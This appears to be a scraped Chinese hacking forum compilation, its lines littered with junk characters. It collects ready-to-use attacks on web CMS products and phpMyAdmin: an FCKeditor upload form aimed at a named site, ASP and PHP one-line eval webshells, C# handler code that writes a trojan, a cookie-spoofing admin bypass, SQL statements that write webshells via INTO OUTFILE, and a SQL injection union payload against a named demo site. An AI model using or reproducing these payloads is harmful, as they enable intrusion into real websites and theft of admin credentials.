. m/ H, } G2 X+ P0 w% }<form id="frmUpload" enctype="multipart/form-data" action="http://www.xxoo.net/controls/fckeditor/editor/filemanager/upload/aspx/upload.aspx?Type=Media" method="post">
$ Y4 r# J( E5 h, p( ~ f4 qUpload a new file:<br>
- w* ]* a( _% f<input type="file" name="NewFile" size="50"><br>
0 C+ q* X* ~& O; j<input id="btnUpload" type="submit" value="Upload">
5 ~0 u) T7 K' ]- g</form>
/ ~- k5 u7 w; l; R-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------2 j3 m: v. I2 K( C& L" K
( {1 u9 E' h! _2 M9 D# G" T0 R8 hSDcms 后台拿webshell
& X1 r, P5 o4 {. x# `& s0 ]' s
4 R2 G+ [; _; L) }7 p# H第一种方法:
( }6 s* x5 @' r进入后台-->系统管理-->系统设置-->系统设置->网站名称;
l9 C. [: _6 h5 i& W, a8 B把网站名称内容修改为 "%><%eval request("xxx")' //密码为xxx# X5 ?1 f! y4 {5 [# x
用菜刀链接http://www.xxx.com/inc/const.asp 就搞定了。
+ T8 K W1 T- _5 s7 a第二种方法:
% O; w2 l& q8 [7 s. h进入后台-->系统管理-->系统设置-->系统设置->上传设置;
7 |& A: f0 i* l在文件类型里面添加一个aaspsp的文件类型,然后找一个上传的地方直接上传asp文件! 注:修改文件类型后不能重复点保存!
# t6 \% s6 } ]1 l* ^- ~第三种方法:, }8 b9 ]( {2 X; `. t) W% p7 ~7 ^
进入后台-->界面管理-->模板文件管理-->创建文件
% \% _# n( u& P, e, z' y' y% e文件名写入getshell.ashx
2 h/ Z' J+ p/ a% B B, B3 C9 K内容写入下面内容:
1 h/ T2 t7 r9 L# {: L/====================复制下面的=========================/% m$ h+ H K+ u: q# w: @2 F# g, f
<%@ WebHandler Language="C#" Class="Handler" %>
7 L" J: `" @5 ^6 }" E( v7 ousing System;
7 Q% p6 ]4 A" L" Q- B$ cusing System.Web;% L( f* ]- F Z$ `% T, A
using System.IO;# Q3 m2 D# E5 o2 @
public class Handler : IHttpHandler {2 F$ J+ t0 U! |# G, b% t
public void ProcessRequest (HttpContext context) {
7 I2 h: \: }6 _context.Response.ContentType = "text/plain";
! E- H9 O, a0 _+ A$ CStreamWriter file1= File.CreateText(context.Server.MapPath("getshell.asp"));& x) E& f+ k+ k+ n' J
file1.Write("<%response.clear:execute request(\"xxx\"):response.End%>");
& T% `& B/ e7 g9 `6 }/ k* i9 Kfile1.Flush();0 m+ i& D* q8 s1 | m4 J! F
file1.Close();7 b1 T- R2 z* r
}& I: b* R0 y1 i! B# @4 }% ^+ G
public bool IsReusable {
3 C) R% v+ x" `+ F O Bget {
+ |; @7 k! S; K5 v3 Sreturn false;% s0 C$ B) d7 ]! E3 k0 n8 f5 |8 K
}
0 ^# S! x$ g/ O- u/ r0 u}
7 u+ ?0 z. ~. e6 u) {6 L}
& y1 @ A$ R% M/=============================================/
, c% o. s7 E& W/ i* ^2 e: c3 i3 B# i访问这个地址:http://www.xxx.com/skins/2009/getshell.ashx
$ ~' E- J% u5 K8 ]) X' D4 k1 c会在http://www.xxx.com/skins/2009/目录下生成getshell.asp 一句话木马 密码为xxx 用菜刀链接" O7 S1 [0 J# h7 S3 f+ }" m
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------
p% g; J) M% s$ S1 R p; z* l
4 s5 y3 q A0 }8 CESCMS网站管理系统0day+ B: f4 ]" Z7 k! p4 Q# t6 A3 R
) @0 j. R: Q# @! D0 c; r; ]( X后台登陆验证是通过admin/check.asp实现的' m& G& f) w# R3 e' i7 E1 ^' Q/ V
7 W) x+ g/ y/ x9 \2 ~% o
首先我们打开http://target.com/admin/es_index.html7 ?$ @0 o" M5 W! b
然后在COOKIE结尾加上7 `# e) {. }& j+ e/ S/ N
; ESCMS$_SP2=ES_admin=st0p;
& }$ }2 m% y' W0 W+ n% }5 B修改,然后刷新- F" {# H0 I6 U1 m( n
进后台了嘎..
) ?; x- ^5 k: y& B& e3 |然后呢…提权,嘿嘿,admin/up2.asp,上传目录参数filepath过滤不严,导致可截断目录,生成SHELL
) w) L8 e& Q$ U$ \" j- K/ }: h" C
利用方法,可以抓包,然后改一下,NC上传,还可以直接用DOMAIN等工具提交.
3 U4 A0 O8 ?* u嘿嘿,成功了,shell地址为http://target.com/admin/diy.asp# Q2 v: B0 i' m9 N1 E
存在这个上传问题的还有admin/downup.asp,不过好像作者的疏忽,没有引用inc/ESCMS_Config.asp,导致打开此页面失败..
2 N! t1 i& M% Z4 h/ a) v在版本ESCMS V1.0 正式版中,同样存在上传问题admin/up2.asp和admin/downup.asp都可利用,只不过cookies欺骗不能用了
9 c B; F! `9 M8 A' }4 F0 ]------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
2 ?+ M# `! B J/ u: _& V! ?" {* z" k$ C w- B" q# ^8 n
宁志网站管理系统后台无验证漏洞及修复' Y1 c+ D2 h. v7 k
# a! V' }6 _9 T7 S7 U/ g网上搜了一下,好像没有发布.如有雷同纯粹巧合!+ x$ H' V) Z5 C, p
官方网站:www.ningzhi.net( c+ s' x2 `5 {4 c9 u. q! O6 b
学校网站管理系统 V.2011版本
) ^$ `$ L Z8 R4 {http://down.chinaz.com/soft/29943.htm : T. i# }! H; j0 X
其它版本(如:政府版等),自行下载.
8 O2 w, Z: n" N% q. `+ V漏洞说明:后台所有文件竟然都没有作访问验证...相当无语...竟然用的人还很多.汗~~~+ z8 _; R& W, a" x- q& q* o2 |8 n
login.asp代码如下:# V6 ^; ?8 K1 ~+ K, e+ R
<% response.Write"<script language=javascript>alert('登陆成功!请谨慎操作!谢谢!');this.location.href='manage.asp';</script>" %>
* Z/ r6 t: W7 z: X2 t/ Mmanage.asp代码我就不帖出来了.反正也没验证.
9 M" O, \3 i* I8 f; `% h7 f: |只要访问登陆页就可以成功登陆.....蛋疼~~~ 对此本人表示不理解!+ {+ C: h4 l: _- @, ^$ U' V
漏洞利用:
l* a3 Y. \9 ~' r* a+ N直接访问http://www.0855.tv/admin/manage.asp
- D$ j) F/ i2 E- e数据库操作:http://www.0855.tv/admin/manage_web.asp?txt=5&id=web55 x" ^3 d* D1 `* z/ H( P
----------------------------------------------------------------------------------------------------------------------------------------------------------------------------: v) G9 c9 Z7 M- b7 h
( M8 \( K, \6 Z
phpmyadmin拿shell的四种方法总结及修复
8 m4 j! K2 D& v, |7 q$ z: Z# s
方法一:- w, S. N7 e- E
CREATE TABLE `mysql`.`study` (`7on` TEXT NOT NULL );
7 c# ` B# j7 e, VINSERT INTO `mysql`.`study` (`7on` )VALUES ('<?php @eval($_POST[7on])?>');
" a" y# V/ t6 k# l' ]4 w7 ?SELECT 7onFROM study INTO OUTFILE 'E:/wamp/www/7.php';
( j: L, l& i! H$ a----以上同时执行,在数据库: mysql 下创建一个表名为:study,字段为7on,导出到E:/wamp/www/7.php
5 j' w9 s" P3 n" I 一句话连接密码:7on3 w; e2 W( R' K- s
方法二:( U6 x$ J5 y& J( m
读取文件内容: select load_file('E:/xamp/www/s.php');
) J' i: v6 ^! L. B写一句话: select '<?php @eval($_POST[cmd])?>'INTO OUTFILE 'E:/xamp/www/study.php'
L$ }# R9 O0 x& M9 ncmd执行权限: select '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'E:/xamp/www/study.php'
D9 o( U: p4 c' G) b5 u4 P& L方法三:" { c2 J, O8 V2 d, `
JhackJ版本 PHPmyadmin拿shell& U/ T! a8 E$ g! H* ?& k5 X
Create TABLE study (cmd text NOT NULL);
( P, o- f, c; P! N5 I( MInsert INTO study (cmd) VALUES('<?php eval($_POST[cmd])?>');% x4 g, k9 `# B) u. @
select cmd from study into outfile 'E:/wamp/www/7.php';. }# A" b6 X' e
Drop TABLE IF EXISTS study;7 v1 J4 X# B4 Q& N$ p
<?php eval($_POST[cmd])?>5 |9 A1 N1 r& A, p% Y/ w
CREATE TABLE study(cmd text NOT NULL );# MySQL 返回的查询结果为空(即零行)。
o: |( i( y+ EINSERT INTO study( cmd ) VALUES ('<?php eval($_POST[cmd])?>');# 影响列数: 1
& g) x9 E' z N0 g, f: d N# e( WSELECT cmdFROM study INTO OUTFILE 'E:/wamp/www/7.php';# 影响列数: 1
% Q, C/ l' F* ? c8 A* M2 QDROP TABLE IF EXISTS study;# MySQL 返回的查询结果为空(即零行)。; d! z3 I' ^/ d# q; T0 I
方法四:9 o) a$ X, d% p6 Z( ?
select load_file('E:/xamp/www/study.php');) T' x1 X0 @& G( Q
select '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'E:/xamp/www/study.php'
! m* Q& E1 Q. u3 p9 c6 d3 |3 w然后访问网站目录:http://www.2cto.com/study.php?cmd=dir; |" [7 L' ?/ b9 y8 X
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------/ F T: C- ~& n: K' Q* f1 H
6 V; Q) ^. j5 @; H7 K( H* B
NO.001中学网站管理系统 Build 110628 注入漏洞. D& o6 n6 K7 p1 F% D6 E
5 _( J. V! I$ l5 l* F% {9 N9 Y
NO.001中学网站管理系统功能模块:3 p9 e8 A/ X6 Y! P' |( O, B
1.管理员资料:网站的基本信息设置(校长邮箱等),数据库备份,用户管理、部门及权限管理等
0 u7 a6 ? N3 d/ V! E( Y; @/ g1 S* t2.学校简介:一级分类,可以添加校园简介,领导致辞、校园风光、联系我们。。。等信息' C! H2 x, |& J7 g* c3 `. n
3.文章管理:二级分类,动态添加各相关频道(图片视频频道、学校概况频道除外)文章等信息4 }, _9 B2 ^) P: Q
4.视频图片管理:一级分类,动态添加视频或者图片等信息
4 y% ?$ ]/ h* u, p F( a0 ?5 @5.留言管理:对留言,修改,删除、回复等管理) u' F: N1 J5 [4 Y! k. v
6.校友频道:包括校友资料excel导出、管理等功能1 K& x# P7 w3 ]+ W
7.友情链接管理:二级分类,能建立不同种类的友情链接显示在首页- D! {1 [5 |: q' I, i
默认后台:admin/login.asp/ ]# k3 K: v8 S2 a( `
官方演示:http://demo.001cms.net$ b _5 ^5 d# q1 S& \
源码下载地址:http://down.chinaz.com/soft/30187.htm
, v. `4 o" ^1 \7 K) XEXP:
& R# p5 G* _: e" m$ O; funion select 1,2,3,a_name,5,6,a_pass,8,9,10,11 from admin$ ?" e, E* `2 W$ x# K
测试:http://demo.001cms.net/shownews.asp?type=新闻动态&stype=校务公开&id=484 union select 1,2,3,a_name,5,6,a_pass,8,9,10,11 from admin' [8 e* t" m( S( c C
getshell:后台有备份,你懂的
% z7 y2 L* a: m另:FCK编辑器有几处可利用.大家自己行挖掘,由于相关内容较多,我在这里就不说了。3 z7 R+ y8 o' U. N- J3 g
------------------------------------------------------------------------------------------------------------------------------------------------------------------------- |